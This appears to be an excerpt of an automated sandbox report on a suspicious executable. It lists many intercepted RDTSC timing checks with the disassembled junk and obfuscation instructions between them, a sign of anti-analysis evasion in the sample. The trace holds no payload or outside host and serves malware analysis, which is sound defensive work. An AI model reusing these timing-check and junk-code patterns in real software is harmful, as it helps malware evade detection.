        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779778 second address: 77977C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77977C second address: 7797F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA1CCCD2156h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push ebx 0x00000010 mov ebx, esi 0x00000012 pop edi 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FA1CCCD2148h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007FA1CCCD2148h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b xchg eax, esi 0x0000004c jmp 00007FA1CCCD214Eh 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 pushad 0x00000056 popad 0x00000057 pop eax 0x00000058 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7797F7 second address: 7797FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C7D6 second address: 77C7DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C7DB second address: 77C7F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FA1CCF9D8BCh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C7F2 second address: 77C7FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F751 second address: 71F76F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C6h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CDAB second address: 77CDE2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007FA1CCCD2152h 0x0000000d jne 00007FA1CCCD214Ch 0x00000013 nop 0x00000014 push esi 0x00000015 mov ebx, edx 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a mov edi, eax 0x0000001c push 00000000h 0x0000001e pushad 0x0000001f mov dword ptr [ebp+122D1A9Dh], esi 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jno 00007FA1CCCD2148h 0x0000002f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CDE2 second address: 77CDF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8BDh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CDF3 second address: 77CDF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DDC0 second address: 77DDCE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FA1CCF9D8BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DDCE second address: 77DDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DDDA second address: 77DDDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DDDE second address: 77DDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DDE4 second address: 77DE21 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FA1CCF9D8C1h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jnc 00007FA1CCF9D8BCh 0x00000012 mov bx, ax 0x00000015 push 00000000h 0x00000017 cld 0x00000018 push 00000000h 0x0000001a mov ebx, dword ptr [ebp+1247608Ch] 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 jo 00007FA1CCF9D8B6h 0x0000002a pop ebx 0x0000002b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DE21 second address: 77DE27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DE27 second address: 77DE2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E067 second address: 77E07C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCCD2150h 0x00000009 popad 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E07C second address: 77E081 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788741 second address: 788753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push ebx 0x0000000a jng 00007FA1CCCD2146h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788753 second address: 78875B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787EBA second address: 787EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787EBF second address: 787EF7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 ja 00007FA1CCF9D8C7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA1CCF9D8C6h 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787EF7 second address: 787EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787EFB second address: 787F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787F04 second address: 787F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 jmp 00007FA1CCCD214Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7881AB second address: 7881B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789ED6 second address: 789EE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA1CCCD214Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789EE9 second address: 789EFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789EFD second address: 789F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA1CCCD2146h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789F07 second address: 789F0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 721231 second address: 72124C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA1CCCD2155h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72124C second address: 72125A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA1CCF9D8B8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72125A second address: 721292 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FA1CCCD2185h 0x0000000e jmp 00007FA1CCCD2150h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA1CCCD2152h 0x0000001a jp 00007FA1CCCD2146h 0x00000020 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7901E9 second address: 7901ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790315 second address: 790348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FA1CCCD2152h 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jo 00007FA1CCCD2146h 0x00000016 popad 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e je 00007FA1CCCD214Ch 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790348 second address: 79034C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79034C second address: 790379 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2157h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e js 00007FA1CCCD2146h 0x00000014 jl 00007FA1CCCD2146h 0x0000001a popad 0x0000001b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795715 second address: 795719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795719 second address: 79571D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79571D second address: 795753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007FA1CCF9D8B6h 0x00000012 jc 00007FA1CCF9D8B6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jbe 00007FA1CCF9D8B6h 0x00000023 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795753 second address: 795786 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FA1CCCD214Eh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007FA1CCCD2150h 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jnc 00007FA1CCCD2146h 0x00000020 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795786 second address: 795792 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007FA1CCF9D8B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794A18 second address: 794A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA1CCCD2146h 0x0000000a jg 00007FA1CCCD2146h 0x00000010 popad 0x00000011 pop esi 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794A2F second address: 794A51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C9h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794C9E second address: 794CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA1CCCD2157h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79523E second address: 795254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795254 second address: 795289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FA1CCCD2158h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FA1CCCD2152h 0x00000016 jng 00007FA1CCCD2146h 0x0000001c jc 00007FA1CCCD2146h 0x00000022 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795289 second address: 795290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795571 second address: 795577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795577 second address: 79559C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007FA1CCF9D8C7h 0x0000000b jmp 00007FA1CCF9D8C1h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007FA1CCF9D8B6h 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79559C second address: 7955C5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA1CCCD2146h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FA1CCCD2159h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7955C5 second address: 7955C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B2C7 second address: 79B2D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B2D6 second address: 79B2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B2DA second address: 79B2F5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FA1CCCD214Eh 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799DB1 second address: 799DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A181 second address: 79A193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCCD214Eh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A193 second address: 79A197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A197 second address: 79A1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA1CCCD2146h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FA1CCCD214Eh 0x00000012 ja 00007FA1CCCD2146h 0x00000018 jmp 00007FA1CCCD2151h 0x0000001d jg 00007FA1CCCD2146h 0x00000023 popad 0x00000024 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A1D0 second address: 79A1F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8BAh 0x00000009 jmp 00007FA1CCF9D8C7h 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A7B8 second address: 79A7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B15C second address: 79B180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA1CCF9D8C5h 0x0000000c jns 00007FA1CCF9D8B8h 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799A8B second address: 799A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79ED04 second address: 79ED0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79ED0A second address: 79ED10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761B6F second address: 761B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761B76 second address: 761B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761B7B second address: 761BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8C3h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FA1CCF9D8C8h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a jnc 00007FA1CCF9D8B6h 0x00000020 pop esi 0x00000021 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761BBD second address: 761BD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761BD5 second address: 761BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761BDA second address: 761BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761BE0 second address: 761BE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761BE4 second address: 761C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov cx, 7FA1h 0x0000000d mov edx, 643B4C6Fh 0x00000012 push 24F96CC8h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a jno 00007FA1CCCD2146h 0x00000020 pop ebx 0x00000021 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761C05 second address: 761C0A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7620A4 second address: 7620AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76242A second address: 762430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762430 second address: 7624BF instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FA1CCCD2148h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 0000001Eh 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007FA1CCCD2148h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 jmp 00007FA1CCCD2157h 0x00000048 nop 0x00000049 jmp 00007FA1CCCD214Ch 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jnl 00007FA1CCCD2146h 0x00000058 jmp 00007FA1CCCD2155h 0x0000005d popad 0x0000005e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76279D second address: 7627A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7627A2 second address: 7627EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FA1CCCD2152h 0x00000011 popad 0x00000012 pop ecx 0x00000013 nop 0x00000014 je 00007FA1CCCD214Ch 0x0000001a mov edi, dword ptr [ebp+122D1A44h] 0x00000020 lea eax, dword ptr [ebp+12478321h] 0x00000026 mov ecx, esi 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FA1CCCD2151h 0x00000030 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F27C second address: 79F284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F284 second address: 79F288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F288 second address: 79F28C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F406 second address: 79F40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F40D second address: 79F444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1CCF9D8C5h 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FA1CCF9D8C7h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F5B5 second address: 79F5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA1CCCD2146h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA1CCCD214Bh 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F5D1 second address: 79F5D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
